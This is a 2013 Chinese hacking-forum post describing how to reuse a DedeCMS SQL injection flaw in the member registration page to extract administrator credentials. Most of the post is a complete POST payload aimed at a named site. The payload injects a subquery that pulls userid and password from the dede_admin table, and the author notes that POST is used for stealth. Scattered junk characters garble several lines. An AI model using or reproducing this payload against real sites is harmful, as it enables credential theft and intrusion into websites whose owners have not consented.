找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2197|回复: 0
打印 上一主题 下一主题

织梦SQL注入漏洞再利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-19 08:25:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞类型: SQL注射漏洞7 R5 ^) O8 D0 H1 Q* P% V
简要描述:2 k2 R0 K* n' N: G
( S8 E1 n7 e" R; L9 e
需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.
, g. `  @- i3 t原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.) \" H' `3 {* \/ T4 {+ z. W  J
详细说明:跟这个漏洞5 R5 Z- Y6 T, w% i: m
2 d4 e3 i) Q2 L
WooYun: Dedecms SQL注射导致审核机制绕过漏洞
& w5 L4 b9 Q. m% X( X2 P是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.# y; i" b* b$ [8 |0 T3 K
POST提交以下数据,其实不用POST提交的,这样隐蔽点.: |$ K) P( I3 A& M- E5 x
6 Q- P0 q$ E: t1 ?
www.political-security.com/member/reg_new.php% S2 u4 l: _( i7 G( G/ ~& k+ m6 e
; C5 ]2 T, J3 y, M
POST- i3 ?7 h) g) s2 Z6 P( H

8 l; A3 @" Z$ j; Zdopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&0 A% T7 l  G7 y+ c
userid=c4rp3nt3r&uname=c4rp3nt3r
7 U2 v4 ?0 ^3 i/ |&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss  b8 ^6 p$ T2 ^
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,
6 s3 E, u0 d" d' ~) Z(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
) u  v, I' t2 D2 z%00&vdcode=glos&agree=
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表